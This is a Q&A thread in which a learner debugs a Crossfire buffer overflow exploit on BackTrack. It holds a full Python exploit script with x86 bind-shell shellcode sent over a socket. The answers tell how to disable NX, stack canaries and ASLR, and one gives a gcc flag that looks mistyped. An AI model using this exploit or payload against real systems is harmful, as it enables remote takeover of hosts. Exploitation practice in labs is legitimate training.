# Linux Memory Protection from buffer overflow

Tags: linux, buffer-overflow, memory, protection

I am practicing Linux buffer overflow exploitation. when trying to exploit a vulnerability in crossfire, everything works well and I get the shellcode placed in the right place, and the program flow gets redirected to shellcode, however, when start executing the shell code, the program fails.

OS version (bt5 R3):
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux

```
exploit code:

import socket, sys
host = sys.argv[1]

//0x8134e77 jump eax 
//0xb7dadad6 nop sled address

shellcode= ("\xcc\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")

crash = "\x90" *199 + shellcode + "\x43" * 4090 + "\xd6\xda\xda\xb7" + "D" * 7

buffer= "\x11(setup sound " + crash + "\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print "[*]Sending evil buffer..."

s.connect((host, 13327))

print (s.recv(1024))

s.send(buffer)

s.close()

print "[*]Payload Sent !"
```

I placed a break point before the shellcode and the execution flow hits it successfully, however, after continuing the program crashes and gives the following message: 
"Program received signal SIGSEGV, Segmentation fault.
0xb7daeb36 in ?? ()"

When inspecting this address, it's full of zeros!

I already disabled ASLR before starting the exercise and I am wondering does any other protection mechanism exist that prevents exploitation?

Answer (score 2):

The way the shellcode is received by the vulnerable program, it will store this shellcode on the stack. You have two protection mechanisms that are going to prevent the shellcode from execution. One is the that stack will be flagged as non executable (the NX bit protection) and the other is the canaries (where a random value is placed before EIP on the stack and checked before poping EIP).

You need to disable both of these protection mechanisms before executing your shellcode from the stack.

If you are using gcc, recompile the vulnerable program like:
**gcc -fno-stack-protector -z stackexec -o vuln_prog vuln_prog.c**

Then perform the exploitation.

Comment: That did not work !

Answer (score 1):

I think I would check your shellcode as it contains values like `xff` which may not work in this instance. Might be worth try to generate new code using metasploit(msfweb), for example, which will allow to exclude certain values 0x00 and the like. 
Also check you have disabled ASLR: `echo 0 > /proc/sys/kernel/randomize_va_space`